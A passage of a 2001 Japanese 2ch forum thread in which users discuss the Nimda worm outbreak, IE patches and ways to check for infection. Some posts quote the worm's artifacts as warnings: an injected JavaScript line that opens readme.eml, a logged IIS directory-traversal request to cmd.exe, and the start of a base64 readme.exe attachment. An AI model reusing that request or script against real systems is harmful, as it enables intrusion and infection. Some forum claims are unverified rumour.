>589 >会社から2KとかNTだったりしないよね? ん?2Kってなんだろう?2000年モデルのことかな? 私は自宅からです、、、。
614 :
:01/09/19 13:12 ID:n5wmWdo2
マイクロソフトのHPが感染してるって事は無いんでしょうか?
615 :
名無しさん :01/09/19 13:13 ID:70l4IFsk
616 :
:01/09/19 13:13 ID:Y5AkCUiQ
617 :
:01/09/19 13:13 ID:hsQGmGak
>>610 キャッシュに反応しただけでしょ。たぶん。
>>610 IE6でも「ダウンロードしますか?」に「はい」と答えると感染してしまうので注意。
>>613 Windows 2000ってこと。
619 :
:01/09/19 13:14 ID:0C89g52A
>>615 じゃぁ、IE6でもダメってことか?
別スレではIE5.5SP2でも同じ奴がいたぞ・・・
620 :
:01/09/19 13:14 ID:CZ4aawQ.
アタックが止まらない。なんじゃこりゃ…。 co.jpとか来てるし。そんな会社、二度と信用するものか。
621 :
ド素人 :01/09/19 13:14 ID:AGkf8kDY
>618 あ、なるほど。 私は確かWIN MEだった。。。
622 :
:01/09/19 13:15 ID:kfsTeeSI
>>611 レスありがとう。
昨日の夜PM11時頃に行ったからちょっと心配だったので。
ちなみに私はIE5.5のSP1です・・・。
623 :
616 :01/09/19 13:15 ID:Y5AkCUiQ
誤爆しまくり…ふざけてやってるようだが本気だ 今度はあえて訂正しないでおこう へへ、おりこうさんだねъ( ゚ー^)
624 :
:01/09/19 13:15 ID:OO3wQbOI
625 :
:01/09/19 13:15 ID:spzt.8VY
626 :
僕も初心者 :01/09/19 13:15 ID:zsQE2Q3w
627 :
:01/09/19 13:16 ID:J6gqWM9Q
>>605 もどってきたよ。人気出ちゃったな。
たまにはマジレス
>>605 は {print $1}
の間違いだろ?え?
628 :
:01/09/19 13:16 ID:byucTCuc
>>610 ,
>>619 テンポラリーにreadme〜.emlがあるだけなら、キャッシュに入っている
だけだから、感染しているわけではない。
正確な確認は
>>592 を見れ
629 :
:01/09/19 13:16 ID:yU4SCrCU
今日はラディン・テロどころじゃないな。
630 :
:01/09/19 13:16 ID:Ov9UHeQs
なんなんだ・・急にco.jpとかac.jpとか・・ヤバいねこりゃ・・
>>618 Meの人は例外なくIEをバージョンアップしましょう。
632 :
ナナシサン :01/09/19 13:17 ID:ETHVTTR2
>697 かえってくんな(w
633 :
:01/09/19 13:17 ID:aUHlluYA
まっすぐ2chに来て良かったー。IE5.5 SP1なんだもんよー。 週末にIE6ver.upするつもりだったけど、今すぐやるよ。
634 :
:01/09/19 13:17 ID:ZGnsXA6c
635 :
:01/09/19 13:17 ID:hsQGmGak
なんかMSN見てたら腹立ってきた。 全然アナウンスが見つからないよ…。 誰かが貼ってたアナウンスってどこから見りゃいいんだ?
637 :
:01/09/19 13:17 ID:J6gqWM9Q
>>631 3歳で88がいじれるのかよ???うそつけ!
638 :
ふしあなさん :01/09/19 13:17 ID:Fo8/uO8I
そんな事より、きいてくれる? 昨晩、インターネット見てたんです。インターネット。 そしたらなんかウイルスがめちゃくちゃいっぱいで立ち上がらないんです。 で、よく見たらなんか窓が出てて、『一般保護違反です』とか書いてあるんです。 もうね、アホかと。馬鹿かと。 お前らな、一般保護違反如きで普段見てないインターネットに来てんじゃねーよ、ボケが。 一般保護違反だよ、一般保護違反。 なんかウイルス感染サイトとかもあるし。一家4台とも感染か。おめでてーな。 よーしパパ修理頼んじゃうぞー、とか言ってるの。もう見てらんない。 お前らな、メリッサやるからその台空けろと。 インターネットってのはな、もっと殺伐としてるべきなんだよ。 回線の向かいに座った奴といつ喧嘩が始まってもおかしくない、 感染させるか感染させられるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。 で、やっと駆除できたかと思ったら、隣の奴が、CODE−RED、とか言ってるんです。 そこでまたぶち切れですよ。 あのな、CODE−REDなんてきょうび流行んねーんだよ。ボケが。 得意げな顔して何が、CODE−RED、だ。 お前は本当にCODE−REDに感染したいのかと問いたい。問い詰めたい。小1時間問い詰めたい。 お前、CODE−REDって言いたいだけちゃうんかと。 ウイルスの俺から言わせてもらえば今、ウイルス通の間での最新流行はやっぱり、 Nimda 、これだね。 W32.Nimda.A@mm大盛りねぎだくギョク。これが通の感染の仕方。 W32ってのは自動メール送信ワームが多めに入ってる。そん代わり件名が少なめ。これ。 で、それにリモートアクセス(遠隔操作)。これ有効。 しかしこれに感染させると、次からエシュロンにマークされるという危険も伴う、諸刃の剣。 素人にはお薦め出来ない。 まあ、i-MACでも使ってなさいってこった。
639 :
:01/09/19 13:18 ID:CIjuhvgQ
>>627 やっぱり、戻ってきたのね・・・・素敵!(w
640 :
CookieMonster :01/09/19 13:18 ID:RpkGMlcw
そんな事より1よ、ちょいと聞いてくれよ。スレとあんま関係ないけどさ。 このあいだ、近所のWindowsUpdateに行ったんです。WindowsUpdate。 そしたらなんか人がめちゃくちゃいっぱいで入れないんです。 で、よく見たらなんかIE5.5SP2とかDLしてるんです。IE5.5SP2。 もうね、アホかと。馬鹿かと。 お前らな、IE5.5SP2ごときで普段来てないWindowsUpdateに来てんじゃねーよ、ボケが。 IE5.5SP2だよ、IE5.5SP2。 なんか親子連れとかもいるし。一家4人でWindowsUpdateか。おめでてーな。 よーしパパが大丈夫かMSNに繋いでみちゃうぞー、とか言ってるの。もう見てらんない。 お前らな、Nimda送ってやるから黙って感染してろと。 WindowsUpdateってのはな、もっと殺伐としてるべきなんだよ。 当てたパッチにバグがあって、いつブルー画面や再起動しなくなってもおかしくない、 刺すか刺されるか、そんな雰囲気がいいんじゃねーか。女子供は、すっこんでろ。 で、やっと入れたかと思ったら、隣の奴が、セキュリティ問題の修正プログラムじゃねー?、とか言ってるんです。 そこでまたぶち切れですよ。 あのな、セキュリティ問題の修正プログラムなんてきょうび流行んねーんだよ。ボケが。 得意げな顔して何が、セキュリティ問題の修正プログラムじゃねー?、だ。 お前は本当にセキュリティ問題の修正プログラムと思っているのかと問いたい。問い詰めたい。小1時間問い詰めたい。 お前、バカなだけちゃうんかと。 通の俺から言わせてもらえば今、WindowsUpdate通の間での最新流行はやっぱり、重要な更新の通知、これだね。 重要な更新の通知。これが通のやり方。 重要な更新の通知ってのはリソース消費が多めに入ってる。そん代わり役立ち度は少なめ。これ。 で、こいつの自動受信でまたバグパッチ。これ最強。 しかもこれをやると次から複数同一シリアルのユーザーはACCSにマークされるという危険も伴う、諸刃の剣。 素人にはお薦め出来ない。 まあお前、1は、Happy99の花火でも見てなさいってこった。
641 :
東スポいわく :01/09/19 13:18 ID:zsQE2Q3w
642 :
:01/09/19 13:18 ID:jDmQpsF2
643 :
:01/09/19 13:18 ID:byucTCuc
>>625 ウィルス仕込んであるぞ。
ここをアクセスしてはイカン!!
644 :
初心者 :01/09/19 13:19 ID:bq3Ce/eg
>>626 サンクス。なるほど、それはいいですね(w
645 :
ド素人 :01/09/19 13:19 ID:AGkf8kDY
>631 そかー。良かった、、、無事にダウンロードできたみたいで、、、。 ウィルスにやられても私の力じゃ到底復旧出来ないし。汗
646 :
:01/09/19 13:20 ID:A2Y42Qew
647 :
113 :01/09/19 13:20 ID:LNEMDmj.
結局やばかった時間はいつ頃なんだろう? 昨日のPM7-8時頃MSN行ったけど大丈夫っぽい。
648 :
640 :01/09/19 13:21 ID:RpkGMlcw
638のほうが面白ぇ・・・。 打つ堕し脳・・・
649 :
:01/09/19 13:21 ID:ZB0YSVAY
…アップデートできねえ…
651 :
:01/09/19 13:21 ID:c8mjbTxo
>>627 新スレたてたら?
「J6gqWM9Qが教えてやる」とか、なんでもいいから
そっちで遊ぼうよ
652 :
:01/09/19 13:22 ID:Y5AkCUiQ
>>627 漏れが使ってるSunOSのpsで-fオプションを付けた場合は$2でいいんだが。
頼むから固定ハンにしてくれよ。
みんなそれを望んでるぞ。
653 :
:01/09/19 13:22 ID:Qz4KH6oo
654 :
:01/09/19 13:22 ID:j4gg3ouk
655 :
:01/09/19 13:23 ID:spzt.8VY
656 :
:01/09/19 13:23 ID:bi15wNtM
w2kなんですが、 さっき雑誌買ってきてIEを入れなおしました。 バージョンにやっぱりSP2ってついてないんですが。 ネットで落とさなくちゃ駄目なんでしょうか?
何て親切なんだ。さっそくUPDATEしたよ。
>>646 EVERYDAY PEOPLEの管理者さんに感謝しましょう。
俺もだけど(w
659 :
ななしさん :01/09/19 13:24 ID:K0x/0bfc
やっとcoderedのXXXXがろぐからすくなくなったのにこんどは "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" こんなんばっかだよ。 最初にきたのが[18/Sep/2001:22:23:37 +0900] だからそれからあっという間に感染したのかな・・・。 またネットが重くなるな。
660 :
:01/09/19 13:24 ID:J6gqWM9Q
>>651 いい加減仕事に戻らなくちゃ。やばい。
納期が差し迫ってるのに2chが。。煽りが。。おもろい。
でもさよなら。
662 :
:01/09/19 13:24 ID:byucTCuc
>>654 「ツール」→「オプション」→「セキュリティ」→「ゾーンの設定」
663 :
名無しさん :01/09/19 13:24 ID:70l4IFsk
>>656 win2kならwin2kのsp2いれれ
664 :
:01/09/19 13:25 ID:jDmQpsF2
>>654 ツール⇒インターネットオプション⇒セキュリティ⇒レベルのカスタマイズ⇒カスタム設定のリセットの順で行けばいい。
665 :
654 :01/09/19 13:25 ID:j4gg3ouk
666 :
:01/09/19 13:25 ID:RmQw2Dvk
667 :
:01/09/19 13:26 ID:TLylaCmY
俺IE6.0(テスト版)だけど、テスト版でも大丈夫なんかいな?
668 :
IE5の :01/09/19 13:26 ID:ALUfLgrg
バージョン5.00.3314.42101. なんだけど 更新バージョンがSP2になってるから安全ですか?
669 :
:01/09/19 13:26 ID:byucTCuc
670 :
:01/09/19 13:26 ID:BdNy5bZY
ワクチンまだ?
漏れ・・・ディスク検索終了>異常なし ちなみにIE6は6.00.2600.0000 +Winme
>>660 そーか、仕事中だったのか。頑張ってくれな。
仕事が終わったら "nanasisanってどうよ?" とか "J6gqWM9Qだけど、何かある?"
とかスレを立ててくれ。一回くらいは書いておくから(w
>>667 IE6正式版が出たので、そちらにバージョンアップすると良いでしょう。
テスト版については未確認(細かいバージョンによって違うこともある)なので、
念のためウイルスチェックをしておくと良いでしょう。
673 :
:01/09/19 13:29 ID:gFkF4KKs
>>668 大丈夫だけど、もう一つの初心者スレでやってよ。
674 :
:01/09/19 13:30 ID:byucTCuc
675 :
673 :01/09/19 13:31 ID:gFkF4KKs
すまん間違えた、5.00は知らん。
677 :
:01/09/19 13:31 ID:J6gqWM9Q
>>672 あ、お前、3歳はいくらなんでもうそだろ。
3歳でどーやって88覚えるんだよ?
日本語もままならないのに。
ぶっちゃけ何歳?
678 :
:01/09/19 13:32 ID:CIjuhvgQ
そろそろ戻ってくるかな?(-。- )
679 :
:01/09/19 13:31 ID:kNF/Pobc
>>622 昨日の11時過ぎだと、まだMSNではNimda配布中か、対策直後か。
とにかくreadme.exeをブラウザから落とした記憶・実行した記憶
があるのであれば、感染可能性大です。
IE5.5SP1云々の話はメールでの感染経路の際に問題になるので、
早急にSP2にバージョンアップが必要です。たとえSP2にしても
ブラウザで感染サーバのWEBページ閲覧時にはダウンロード指定が
かかってしまいますけどね。その段階でとりあえずメール→OUTLOOK
経由での無意識感染は防げると。
680 :
ウイルス :01/09/19 13:32 ID:5U62y4GY
我地に平和を与えんために来たと思うなかれ。 我汝等に告ぐ、然らず、むしろ争いなり。 今から後一家に5人あらば3人は2人に、 2人は3人に分かれて争わん。 父は子に、子は父に、母は娘に、娘は母に
681 :
:01/09/19 13:33 ID:ALUfLgrg
>673 サンクスコ。てゆか書いてあったよ感染チェックなとこに。
682 :
共同通信 :01/09/19 13:34 ID:3qEhW3xw
13:30 ★都留信組が感染 コンピューターウイルス
683 :
:01/09/19 13:35 ID:tNwPfZy6
で、どういう症状が出るの?
684 :
:01/09/19 13:35 ID:kNF/Pobc
>>679 間違えた。ダウンロード指定がかかるのはreadme.emlね。
685 :
:01/09/19 13:36 ID:jDmQpsF2
686 :
:01/09/19 13:37 ID:CIjuhvgQ
関係無いがマリナーズが勝った。。。
>>677 マジ話で3歳なんだけどな・・匿名である以上信じて貰えないかもしれないけど。
もちろん漢字とか英語の難しいものとかは読めないので父親の支援はしてもらってたけど。
その後に父親が英語とPCに対して恐怖症(胃潰瘍っぽい)になってしまって入院したけど。
以後Windows98が出てくるまで、父はPCを触ることが出来なかった。
688 :
:01/09/19 13:38 ID:kfsTeeSI
>>679 丁寧にありがとう。
感染したファイルが無いか調べたけど、一応無いみたいだった。
けどこれを機会にバージョンアップします。
689 :
:01/09/19 13:39 ID:OO3wQbOI
>>682 カワイソー やられたのは、ISPのwww.mfi.or.jp本体なのに、
店子の信組が報道されるとは…。
世も末だ…。
690 :
名無し :01/09/19 13:39 ID:r9Obg67M
トレンドマイクロ株価+17%
691 :
ななな :01/09/19 13:39 ID:nUIlkjLM
これってcode red用のパッチをあててると大丈夫なのかな?
692 :
:01/09/19 13:40 ID:J6gqWM9Q
>>687 わざわざどうもありがとう。
まあいいや、信じるよ。
じゃ、また会う日まで。
UNIX板にたまにいるのでばいばい。
693 :
:01/09/19 13:41 ID:cFHCRmHk
これってゲイツの陰謀??
>>691 サーバ側はこれからの攻撃に備えておく意味で、Code Red対応を含めて
致命傷となりうる全てのパッチを適用しておいた方がよい。
ただ、パッチでしかないので万が一サービスが起動しなくなってしまうとか
いう可能性も否定できないので注意。
695 :
:01/09/19 13:43 ID:qoYGpfgM
旅行代理店や病院、共同通信(東京)など複数の報道機関のサーバーが感染した疑い 山梨学院大(甲府市)のウェブサイトや早稲田大(新宿区)理工学部の一部研究室 マイクロソフト社のインターネット接続サービス「MSN」のサーバーも18日午後 11時ごろ、感染被害を受けた。 ほかにも10−20件のサイトが被害に遭っているという。
697 :
:01/09/19 13:52 ID:cBk407FU
誰かまとめてくれ
698 :
:01/09/19 13:54 ID:OVdoWqpg
SP2のインストールが途中で止まったりして上手く行かない人へ 1.最小構成インストール、又はブラウザのカスタマイズ(C) を選ぶ。 2.次の画面の右下のボタン「詳細設定」を押して、「ダウンロードのみ」 を選ぶ。 3.ダウンロードが終わったら、すぐにインストールせずに、 PCをセーフモードで再起動 4.セーフモードで起動した状態でインストール これでインストールできます。
699 :
:01/09/19 13:55 ID:I2xFE9vM
700 :
うさきてぃ :01/09/19 13:56 ID:/9W6TN7E
701 :
ナナシサソ :01/09/19 13:59 ID:uy8Pfu/w
702 :
:01/09/19 14:01 ID:gSqSbTks
>J6gqWM9Q 友達いないの? もう2度と、こなくていいよ〜。 nanasisanのように、われわれ初心者に丁寧に答えてくれている方に(感謝!) 対しての攻撃見てると、ウザイというより悲しすぎ。雰囲気読めよ。 煽るだけでくその役にも立ってないお前は、逝ってよし。 あ、もしかして、かまってほしいためのネタか?
703 :
前スレの494 :01/09/19 14:03 ID:m9yCiymc
704 :
>471 :01/09/19 14:04 ID:kNLP5jRY
>IE5.0です。 >昨日の晩、クラックされたどっかの大学のHPをエロサイト対策と >同じ装備で見に行ったんだけど、大丈夫だったよ。 >半角板に感謝(藁 どんな装備か教えてくんろ
705 :
_ :01/09/19 14:05 ID:X1tZVd5o
ここまで読んだ。 どうやら祭りのようだねワショーイ!
706 :
:01/09/19 14:06 ID:bi15wNtM
だー!! おりゃーもうあきらめただ。 感染したらしょうがない。 IE6が落とせないんだもの・・・ 会社のパソコンだしもういいや!
707 :
:01/09/19 14:07 ID:lmu1o5BA
708 :
_ :01/09/19 14:07 ID:X1tZVd5o
Windows6.0ならだいじょぶなようだけど、 Windows6.0betaじゃだめなの?
710 :
:01/09/19 14:09 ID:FybIJFzw
711 :
:01/09/19 14:09 ID:1.lomIS.
712 :
Nimdaをハングルで書いてみました。 :01/09/19 14:09 ID:OO3wQbOI
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
□□□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□□□□□□□□□□□■□□□□
□■□□□□□□□□□■□□□□■■■■■■■■□□■□□□□
□■□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□■□□□□□■■■□■□□□□■□□□□□□□□□■□□□□
□■■■■■■□□□□■□□□□■□□□□□□□□□■■■■■
□□□□□□□□□□□■□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□■■■■■■■■□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■□□□□□□□■□□□□□□□□□□□□□□■□□□□
□□□■■■■■■■■■□□□□□□□□□□□□□□■□□□□
□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□□
http://kr.dailynews.yahoo.com/headlines/tc/20010919/maeilbiz/ma2001091907769.html
713 :
:01/09/19 14:09 ID:4L6u712M
@@@@@@@@ここまで読んだ@@@@@@@@ りゅうくん専用
714 :
:01/09/19 14:10 ID:/LsUGfPI
ヨカタヨ・・・前にIE5.5SP2落としといて・・・
715 :
:01/09/19 14:10 ID:bi15wNtM
>>709 ありがと。
ちゃうねん、ファイルDLできへんねん。
なんか設定おかしいんかな?
もう何十回も試してるねんけど・・
716 :
:01/09/19 14:11 ID:N4U8iOCw
717 :
前スレ474 :01/09/19 14:11 ID:0JDuiGy.
718 :
:01/09/19 14:12 ID:1L5pANOU
>>715 今回のウイルス対策でDL不許可にしてあるんでない?
>>715 設定まわりを確認した方がよいかも。
あと、会社内とかだと皆が一斉にダウンロードを始めている可能性アリ。
けっこういろんなメールマガジンとかで警告してるみたいだし。
720 :
:01/09/19 14:13 ID:ljeMpPVA
msnなんてみてるのは初心者かDQNの証拠。 設定の仕方を知らないだけ。 あんな、偏った編集方針のHPを喜んでみているヤツは国賊。
721 :
_ :01/09/19 14:14 ID:X1tZVd5o
ひょっとして、これってオサマの仕業なの? それと、このネタがいしゅつなの?
722 :
あうー :01/09/19 14:15 ID:bi15wNtM
>>718 DLする前にはセキュリティリセットしてあるんだよ〜。
ホントに不思議。ファイル落とせないパソコンになてる。
>>719 周りはMACばっかなので関係無いらしい。
さっき、怖くなって雑誌買ってきてIE5,5入れなおしました。
でも、Ver見てもSP2付いてないですし。
723 :
:01/09/19 14:16 ID:/LsUGfPI
>>161 ぜったいある。普通はwavなかったらおかしい。
つまり、それは感染している証拠にならない。
724 :
:01/09/19 14:16 ID:byucTCuc
>>717 ハイクオリティファッションヘルス「GII」
↑
やられてる。
スケベ〜なヤツは気をつけろ。
725 :
723 :01/09/19 14:16 ID:/LsUGfPI
726 :
:01/09/19 14:17 ID:oestFoJ6
IE6.0ダウソできた。時間かかったけど。
728 :
:01/09/19 14:17 ID:q5SfIw9I
riched20.dllを叩き消したんだけど、なんか問題起こるの?
729 :
:01/09/19 14:18 ID:wNKH/hOE
730 :
113 :01/09/19 14:19 ID:LNEMDmj.
スポニチの速報でカルーセル麻紀の逮捕を知る。 ↓ 2ちゃんの速報板をチェックしてみようと思う ↓ 前スレの存在に気づいて慌てて検索して対策する 正直、カルーセル麻紀メソバーに感謝してる
731 :
:01/09/19 14:19 ID:H2D68rEQ
732 :
:01/09/19 14:20 ID:ywtmKh3.
WindowsXP を 売 る た め の や ら せ で す か ?
733 :
ナナシサン :01/09/19 14:20 ID:ETHVTTR2
カルーセル麻紀て58才なんだよな・・・ 見えねぇよ
734 :
Windowsは厨房専用OS :01/09/19 14:21 ID:tLF66/ns
735 :
:01/09/19 14:22 ID:bi15wNtM
736 :
:01/09/19 14:23 ID:3AnOZHiA
そう言えばIE4の人はどうするんだろ。 うちのサイトのアクセスログでも4%程度いるけど。 これを機会にIE5かIE6にバージョンアップせにゃならんのか。
737 :
:01/09/19 14:24 ID:/LsUGfPI
>>732 まだ発売日前だろ(w
ほんとにやるんだったら発売直後にやると思われ。
738 :
:01/09/19 14:26 ID:/LsUGfPI
>>736 大丈夫。「重い」ってほどでもない。
Pentium-100MHzぐらいでもだいじょうぶ。
そろそろ Lynx使いですけど何か? とか出てきそうだな(´ー`)y-~~
740 :
:01/09/19 14:28 ID:lRwN9gws
ネスケで感染サイト見に行った人、キャッシュに*.emlファイル残ってると思うから 不用意に実行/プレビューしないでね。 エディタで開いて (略) --====_ABC1234567890DEF_==== Content-Type: audio/x-wav; name="readme.exe" Content-Transfer-Encoding: base64 Content-ID: <EA4DMGBP9p> TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJmqSzxytU88cbVO (略) こーんな感じの内容があったら速攻削除。 ちなみにキャッシュ内のファイル名ではノートン先生はチェックしてくれませんでした。 ニャロメ
741 :
:01/09/19 14:28 ID:T.hgQQdI
desktop.emlで検索して数百個HITしたら確定?
742 :
:01/09/19 14:28 ID:Gmx2gDPs
743 :
win98、5.5SP1使用 :01/09/19 14:29 ID:e2EuAUw2
このスレを見て、.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』検索。ヒット無し。 で、その後SP2にバージョンアップした後確認のために再度検索。『readme.exe』ヒット! これってMSNで感染したってこと?
744 :
ナナシサン :01/09/19 14:30 ID:ETHVTTR2
>741 ホボカクテイ
745 :
( ´∀`)さん :01/09/19 14:31 ID:QbKUioVk
ヽ(`Д´)ノ カンセンシチャッタヨ!! ( ) ウワァァン!! / ヽ
746 :
:01/09/19 14:31 ID:Muk2xWjs
___| ̄|__ | ̄| | ̄| ___| ̄|___ | ̄ ̄ ̄| | __ | | .| | | |___ ___| | ̄ ̄ ̄ ̄| |___| ./ | |_| | | | |  ̄ ̄| / // \ __/ /\ _/ | ___/ | __/ / // \\|_/\ |___/ |___/// |____//// < /)__∧ Λ_Λ ∧__(\ > < | |`∀´〉 ◯< `∀´ >◯ 〈`∀´| | > < ( ) \ / ( ) > < / /> > |⌒I │ く く\ \ > < <__フ〈__フ (_) ノ <__,,〉<__〉 > /______ レ _| ̄|___\\\\ / |____ | | ̄| / ̄| |_ __ | ___ |\_/ /  ̄ / / | | /_ / |___| \ / | ̄|/ / | |__| | \| \ / |____|
747 :
:01/09/19 14:32 ID:oaR/VUnY
>>743 本当そうなら大問題では?
どうなんだろ。
748 :
。 :01/09/19 14:32 ID:lHTAht3M
>「タスクスケジューラの署名を確認しています」のところまでいくと >「ファイルをダウンロードできないからもう一度やりなおせ」みたいなメッセージが何度やっても出て来て、 >最後までいかないんだけど・・ と書いている人がいたのですが、私も同じ事が起きてDLできません。 どうしたら良いのでしょう?
749 :
:01/09/19 14:33 ID:jhDeJex2
>>743 俺はアップデートしても感染しなかったぞ。ついさっきやったばっかりなんだが…。
750 :
:01/09/19 14:34 ID:xejTGd/A
ファイル検索の結果、 readme.exe=なし MEP51B3.TMP.EXE=なし *.eml=1つハケーン(だがこれは漏れが保存したメール) という結果。直前にIE5.5SP2を導入した為感染してなかった。 そういえばうちメールでウィルス来たことないんだよなぁ… いいことなんだがちょっと悲しい…
751 :
LINUX使い :01/09/19 14:35 ID:tLF66/ns
ぎゃはははは。 MSNJAPANだけじゃなくて WINDOWSアップデートサーバに接続した奴も感染してるんじゃなーのか? ぎゃはははははは。ばーか、まぬけだな。おまえら
752 :
:01/09/19 14:35 ID:KvKCI3nI
それでなんでサーバーが重くなるのですか? 初心者ですいません。
753 :
_ :01/09/19 14:36 ID:zYHPZHs6
ガイシュツだったらスマソ。 感染したHPの最後には <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> っていう記述が挿入されている。 これによって"readme.eml"が別Windowで起動して、同時にReadme.exeがDLされる。 だったら、スクリプトの実行を不許可にしておけば、IEのバージョンあげなくても 大丈夫なんじゃない? 漏れって浅はか?
>>748 初心者向けスレで、セーフモードならインストールできるって書いてあるよ。
>>751 Linuxの某の開発に携わっている者として恥ずかしいな・・
755 :
:01/09/19 14:37 ID:/LsUGfPI
>>752 急いでアップデートしようとしている人で混んでいます。
756 :
:01/09/19 14:38 ID:FfVSsuh6
>749 俺も今5.01SP2にしたばっかりだけど大丈夫だったYO! ネタだろ。
757 :
:01/09/19 14:38 ID:xejTGd/A
いっその事IE6にしてみようと落としてるんだけど、20Mは結構な量だな。
759 :
:01/09/19 14:40 ID:xejTGd/A
感染している場合、readme.exeってどこに保存されるの?
760 :
。 :01/09/19 14:41 ID:lHTAht3M
>754 それがね、それでも出来ないの・・・
>>743 >>756 たぶん他のページで感染したか、もしくは会社内とかでProxyのキャッシュに
残っていたものをダウンロードしてしまったのではないかと。
762 :
衝撃の名無しさん :01/09/19 14:41 ID:3Vs43vRs
俺も今5.5SP2にした。恐いね。 確認って、バージョン情報の更新バージョンがSP2ならいいんでしょ?
763 :
:01/09/19 14:41 ID:xejTGd/A
あと、感染するのはMSNのトップページだけ? 昨日WinXPの特集ページ見ていたんだが…
764 :
:01/09/19 14:42 ID:/LsUGfPI
765 :
:01/09/19 14:42 ID:xejTGd/A
766 :
:01/09/19 14:42 ID:mB/qaWyo
gooとかgoogleとかは大丈夫かな。gooのフリーメール使ってるけど、 開くの怖いな。
767 :
:01/09/19 14:43 ID:jhDeJex2
768 :
:01/09/19 14:43 ID:xejTGd/A
Script切ってMSN見てくるか…
>>763 MSNに限らずあちこちに蔓延するモノ(すでに蔓延している)なんで、
念のためウイルスチェック(最新のパターンファイルで)をしておくとよい。
あとreadme.exeのファイル検索も。
利用法とも引っかからなければおそらく大丈夫。念には念を入れておくのが良いでしょう。
770 :
:01/09/19 14:44 ID:kNF/Pobc
>>752 NimdaはIISサーバーに感染した場合、他のIISサーバーに
自己複製しようとして、侵入用のリクエストを自動的に
打ちまくる。たとえそれがIISサーバーではなくてApache
だろうと、なんだろうとおかまいなし。
感染が広がってリクエスト量がネットに広がれば広がるほど
混雑が増す、というわけ。もちろんサーバー自体攻撃するほうも
されるほうも処理が増えるから遅くなるし、クライアントがNimdaで
送信するメールもその混雑を増加させる。
百害あって一理無し。
771 :
自分5.0なんだけどアップデートしようか怖くて悩んでいる人 :01/09/19 14:45 ID:bQrRO.9U
743 :win98、5.5SP1使用 :01/09/19 14:29 ID:e2EuAUw2 このスレを見て、.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』検索。ヒット無し。 で、その後SP2にバージョンアップした後確認のために再度検索。『readme.exe』ヒット! これってMSNで感染したってこと? 756 : :01/09/19 14:38 ID:FfVSsuh6 >749 俺も今5.01SP2にしたばっかりだけど大丈夫だったYO! ネタだろ。 5.01SP2と5.5SP2って違う場所からダウンロードじゃなかった でしたっけ?それならば5.01はOKってことだったら、やばいですよね…
773 :
衝撃の名無しさん :01/09/19 14:45 ID:3Vs43vRs
>>764 -765ありがと。
あと、VBのオンラインスキャンってもう対応してる?
それとも、自分でreadme.exe検索したほうが(・∀・)イイ?
774 :
:01/09/19 14:46 ID:I3H4ktQc
775 :
:01/09/19 14:46 ID:tLF66/ns
あほだなおまえら。スクリプトOFFにしたらMSNはみれないんだYO。 だから、ばかみたいにひっかかるだろ。
>>728 # 誰も書いてなさそうなのでお返事。
riched20.dllはワードパッドとか複数のアプリケーションで使われています。
従って、消してしまうとそれらのアプリケーションが動かなくなってしまったり、
表示がおかしくなってしまったりします。
778 :
:01/09/19 14:48 ID:iAsksBJ.
実家で親がPC買って楽しそうにネットサーフィンしてるけど… どうやって親に説明したもんかな。 直接出向いて設定したほうが安全か。
779 :
_ :01/09/19 14:48 ID:zYHPZHs6
落ち着こうよ。 要はスクリプト切っとけばとりあえず大丈夫なんだろ? 見れなくなるページも出てくるけど、感染の確立はないはず。 慌ててバージョンアップする必要ない気がするんだが。 みんなで微妙に不安を煽ってないか? ま、2chだからそれが正しいのかもしれないけどね。
780 :
名無しさん :01/09/19 14:48 ID:K0x/0bfc
>770 coderedの時も不要なトラフィック増えたけどこんどのNIMDAはそれ以上に 不正アタックがきてる。まだ一日たってないのにこの普及の速さは驚異的。 IISをつかってる人は管理スキル低すぎる。
781 :
:01/09/19 14:50 ID:/LsUGfPI
IIS使ってるcodered対策もしてない糞管理者は逝ってよし
782 :
:01/09/19 14:50 ID:byucTCuc
783 :
:01/09/19 14:50 ID:FybIJFzw
>>782 感染経路はそれだけじゃない。ちゃんとパッチあてて
対策するように。
785 :
名無し :01/09/19 14:50 ID:9jLRYBy.
UNIXサーバにも感染したという未確認情報。
>>779 慌ててバージョンアップする必要は必ずしも無いだろうな。
あまり煽るのは良くないってのも同意する。
オイルショックのようなパニック状態を防ぐという意味でも。
787 :
:01/09/19 14:52 ID:/7WKjljc
789 :
:01/09/19 14:51 ID:l3Az/LM.
791 :
:01/09/19 14:53 ID:dvZoh28Q
未確認情報ってのはなんとなくそうおもったってこと?
>>785 >>788 十中八九ネタ。今回のウイルスでない別のウイルス(ワーム)に感染したというのなら話は別だけど。
793 :
:01/09/19 14:53 ID:/LsUGfPI
794 :
:01/09/19 14:55 ID:dUAYMCrs
795 :
前スレの494 :01/09/19 14:55 ID:m9yCiymc
サーバーが感染したときの現象を実体験からちょっと・・・ exchsrvr以下の「〜.exe」や「〜.dll」ファイルが、 ことごとく79225bytesの「〜.eml」に改ざんされていた。 感染したら、ほとんど再インストしか方法がないね、おそらく。
796 :
ななしさん :01/09/19 14:56 ID:1wQ9QV6U
>1.『*.eml』『readme.exe』『MEP51B3.TMP.EXE』の検索でHIT やっぱ「名前で検索」より「含まれる文字列」で検索でしょうか? 『*.eml』を含まれる文字列で検索したところ、3つのファイルがヒット。 いずれも『*.eml』の文字列が無い、一見普通のファイルなんですが・・・。
797 :
:01/09/19 14:57 ID:jhDeJex2
